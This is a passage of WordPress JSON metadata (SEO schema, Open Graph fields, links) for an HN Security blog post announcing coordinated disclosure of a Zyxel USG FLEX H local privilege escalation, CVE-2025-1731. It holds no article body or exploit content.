(CVE-2025-1731)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"name\":\"HN Security\",\"description\":\"Offensive Security Specialists\",\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\",\"name\":\"HN Security\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"width\":696,\"height\":696,\"caption\":\"HN Security\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/hnsec\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/hnsecurity\\\/\",\"https:\\\/\\\/github.com\\\/hnsecurity\",\"https:\\\/\\\/infosec.exchange\\\/@hnsec\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/89a4174c275f05d6148fb0fdedc8de4f\",\"name\":\"Marco 
Ivaldi\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"caption\":\"Marco Ivaldi\"},\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/author\\\/marco-ivaldi\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) -","description":"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/","og_locale":"it_IT","og_type":"article","og_title":"HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) -","og_description":"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).","og_url":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/","og_site_name":"HN Security","article_published_time":"2025-04-23T05:27:16+00:00","article_modified_time":"2025-10-21T09:01:44+00:00","og_image":[{"width":1600,"height":836,"url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","type":"image\/jpeg"}],"author":"Marco Ivaldi","twitter_card":"summary_large_image","twitter_creator":"@hnsec","twitter_site":"@hnsec","twitter_misc":{"Scritto da":"Marco Ivaldi","Tempo 
di lettura stimato":"5 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#article","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/"},"author":{"name":"Marco Ivaldi","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/89a4174c275f05d6148fb0fdedc8de4f"},"headline":"Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)","datePublished":"2025-04-23T05:27:16+00:00","dateModified":"2025-10-21T09:01:44+00:00","mainEntityOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/"},"wordCount":1317,"publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","keywords":["cve-2025-1731","network","0day","advisory","exploit","vulnerability research","zyxel"],"articleSection":["Exploits","Vulnerabilities"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/","url":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/","name":"HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) 
-","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#primaryimage"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","datePublished":"2025-04-23T05:27:16+00:00","dateModified":"2025-10-21T09:01:44+00:00","description":"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).","breadcrumb":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#primaryimage","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","width":1600,"height":836,"caption":"Zyxel Networks logo"},{"@type":"BreadcrumbList","@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hnsecurity.it\/it\/"},{"@type":"ListItem","position":2,"name":"Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)"}]},{"@type":"WebSite","@id":"https:\/\/hnsecurity.it\/it\/#website","url":"https:\/\/hnsecurity.it\/it\/","name":"HN Security","description":"Offensive Security 
Specialists","publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hnsecurity.it\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/hnsecurity.it\/it\/#organization","name":"HN Security","url":"https:\/\/hnsecurity.it\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","width":696,"height":696,"caption":"HN Security"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/hnsec","https:\/\/www.linkedin.com\/company\/hnsecurity\/","https:\/\/github.com\/hnsecurity","https:\/\/infosec.exchange\/@hnsec"]},{"@type":"Person","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/89a4174c275f05d6148fb0fdedc8de4f","name":"Marco Ivaldi","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","caption":"Marco 
Ivaldi"},"url":"https:\/\/hnsecurity.it\/it\/blog\/author\/marco-ivaldi\/"}]}},"jetpack_featured_media_url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","_links":{"self":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/5313","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/comments?post=5313"}],"version-history":[{"count":8,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/5313\/revisions"}],"predecessor-version":[{"id":161160,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/5313\/revisions\/161160"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media\/159969"}],"wp:attachment":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media?parent=5313"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/categories?post=5313"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/tags?post=5313"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}